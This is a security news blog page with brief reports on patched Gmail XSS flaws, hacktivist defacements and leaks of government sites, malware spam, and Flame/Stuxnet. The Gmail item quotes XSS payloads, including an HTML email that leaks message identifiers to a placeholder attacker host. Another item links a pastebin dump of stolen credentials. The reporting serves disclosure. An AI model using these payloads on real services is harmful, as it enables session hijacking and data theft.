Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

XSS Vulnerability
Breaking News Vulnerability Web Application Vulnerability XSS Vulnerability

Google patched Persistent XSS vulnerabilities in Gmail


A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :

A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.

The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar

The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.
Read more »
Team GhostShell
Team GhostShell

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A Hacker known as Echelon, leader of Team GhostShell, launched a new campaign called ProjectWestWind, an operation aimed at “extreme-right nationalism and racism” in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group has gained access to their databases, publishing 22 login details and 68 entries from a table named “docent.”

Names, usernames, passwords and email addresses have been also stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of them being taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.
Read more »
Spam Report
BlackHole Exploit Spam Report

Amazon spam email leads to Blackhole Exploit kit website


Fake amazon notification mails are hitting inboxes and trying to lure recipients into following the links that hosts Blackhole Exploit kit . The email has been spotted by GFI researchers.

The mail may look legitimate . The only thing that gives it away at first glance is the fact that multiple email addresses are included in the "To:" field, and the email is personalized for the first recipient.

The links in the email leads to various legitimate but compromised WordPress domains. Their URLs contain the following section in their syntax:

/wp-content/themes/twentyten/zone(dot)html

Blackhole exploit code tries to exploit the Adobe Reader &Flash , Java vulnerabilities. If you have one of the vulnerable application installed in your system, then the kit will exploit the vulnerability and infects users system.

Read more »
Database Leaked
Database Leaked

Intruders break into University of North Florida

The University of North Florida(UNF) has started to sending out email notification to users after they have learned that database containing information about people who submitted contracts to live in the UNF residence halls could have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011.  The hacker may compromised the sensitive data includes approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for a period of one year includes Credit report,Daily 3 Bureau Credit Monitoring,Identity Theft Resolution,ExtendCARE and $1 Million Identity Theft Insurance.

Read more »
Spam Report
Spam Report

"Hello Dear" a DHL notification mail leads malware infection



Epic Failed: A mail that purportedly coming from DHL informs that user delivery Processing complete successfully.  The truth is that the mail is not coming from DHL. If you look into the starting word of the mail, you can easily identify it. The mail starts with "Hello Dear". 

The Spam mail :

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware.Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]" or "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]"

Read more »
Defaced Website
Defaced Website

Karachi News website hacked by nyro hacker and Army Of Destruction

A Hacker called as Nyro Hacker break into the Pakistan's Premier News Web Portal , The Karachi News (karachinews.com.pk).  Hacker defaced the website.

At the time of writing this article, the website displays an "under construction message" in the main page.

The mirror of the defacement is available at the zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/

Read more »
PrivateX
Anonymous Philippines Breaking News Defaced Website PrivateX

7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The Hacker group called as "PrivateX",a coalition of local hacker groups HukbalaHack,Anonymous, PrivateX and Philkers, hacked Seven Philippines Government websites on Independence Day as a form of protest against new anti-cybercrime bill.

According to GMA News,The websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph), the Philippine Anti-Piracy Team website (papt.org.ph).

Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph), and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever user access above mentioned websites, the are redirected to a another page that has the defacement message of PrivateX.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," Hacker said in the defacement page.
Read more »
Defaced Website
Breaking News Defaced Website

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

Hackers didn't mention the reason for the attack but the wrote the following message in the defacement page "No News Is a Good News "along with a “quote of the day” that read:

Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At the press time, the Website OpenVPN.com has been restored and back to online. The mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.
Read more »
Zer0Pwn
Hackers News Zer0Pwn

The official website of the State of Louisiana hacked by Zer0Pwn

The Hacker known as Zer0Pwn have managed to gain unauthorized access to the official website of the State of Louisiana(Louisiana.gov).

Hacker dumped the compromised database in pastebin. The dump includes emails, passwords, root users, and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed that he found xss vulnerability in SubjectPlus, a web-application software used by mostly educational websites. He posted the proof-of-concept in pastebin.
Read more »
Web Application Vulnerability
SQL Injection Vulnerability Vulnerability Web Application Vulnerability

Alaska.edu vulnerable to SQL injection


A Grey-hat hacker called as 'G4mbi7' discovered SQL Injection vulnerability in the Alaska Volcano Observatory website.

The site is vulnerable to Blind Sql injection ,according to the hacker report. He found this vulnerability a few months ago.

But there is no patch from admin. So he decided to inform about the vulnerability to the admin. He sent a notification with details about the vulnerability. After a week , the admin patched vulnerability.

Read more »
Malware Report
Breaking News Malware Report

Flame and Stuxnet malware unleashed by same Master


The Two infamous malwares Flame and Stuxnet are unleashed by same Master, say Kaspersky Labs, who have discovered an identical piece of code in both worms. What appeared to be two unrelated programs are probably part of the same cyberwar campaign.

Experts spotted the Flame malware last month. Intially They didn’t consider the two pieces of malware related because Stuxnet (and Duqu) were created based on the Tilded platform, while Flame was not.

However, as it turns out, researchers  unearthed some previously unknown facts that completely transform the current view of how Stuxnet was created and its link with Flame.

Even though the two viruses are built on completely different platforms and most likely developed independently, they shared key pieces of code during the development process, the security firm explained.

The finding in question relates to “Resource 207,” a module found in earlier versions of Stuxnet that bears a list of “striking resemblance” to Flame, including “names of mutually exclusive objects, the algorithm used to decrypt strings and similar approaches to file naming.”

"The new findings that reveal how the teams shared the source code of at least one module in the early stages of development prove that the groups co-operated at least once," wrote Aleksandr Gostev, chief security expert for Russian security company Kaspersky Labs.

More details about the analysis can be found here.

Read more »
Subscribe to: Comments (Atom)